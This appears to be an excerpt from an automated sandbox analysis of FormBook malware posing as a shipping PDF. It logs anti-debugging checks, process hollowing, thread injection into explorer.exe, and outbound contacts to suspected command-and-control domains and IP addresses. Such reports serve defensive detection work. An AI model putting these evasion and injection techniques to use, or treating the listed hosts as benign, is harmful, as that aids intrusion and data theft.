        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FDBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DF358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A03B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A03B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DDB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA8B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DDB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A914FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA8CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A035A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A01DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A01DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A01DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A88DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009ED5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009ED5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9E539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A5A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A04D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A04D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A04D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA8D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DAD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F7D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A13D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A53540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A546A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6FE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A016E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A18EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A8FEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A036CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA8ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E76E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A8FE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A08E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DE620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E8794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A57794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A57794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A57794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A137F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009FF716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D4F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D4F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A6FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA8F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009EEF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009EFF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeProcess queried: DebugPort
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess queried: DebugPort
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00409B40 LdrLoadDll,

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeDomain query: www.goodtasteonline.com
        Source: C:\Windows\explorer.exeDomain query: www.thesidehustler.net
        Source: C:\Windows\explorer.exeNetwork Connect: 37.123.118.150 80
        Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
        Source: C:\Windows\explorer.exeDomain query: www.mmfaccao.com
        Source: C:\Windows\explorer.exeDomain query: www.lnvietnam.online
        Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
        Source: C:\Windows\explorer.exeNetwork Connect: 35.209.104.90 80
        Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
        Source: C:\Windows\explorer.exeDomain query: www.blttsperma.quest
        Source: C:\Windows\explorer.exeDomain query: www.bombers.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
        Source: C:\Windows\explorer.exeDomain query: www.jkformationfrance.com
        Source: C:\Windows\explorer.exeDomain query: www.alltart.com
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 11F0000
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1A0000
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1070000
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeMemory written: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeMemory written: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeMemory written: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe base: 400000 value starts with: 4D5A
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeThread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeThread register set: target process: 3472
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeThread register set: target process: 3472
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeThread register set: target process: 3472
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeThread register set: target process: 3472
        Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3472
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeProcess created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
        Source: explorer.exe, 0000000D.00000000.336648203.0000000005EA0000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
        Source: explorer.exe, 0000000D.00000000.325394802.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
        Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
        Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings:

        barindex
        Uses netsh to modify the Windows network and firewall settingsShow sources
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

        Stealing of Sensitive Information:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
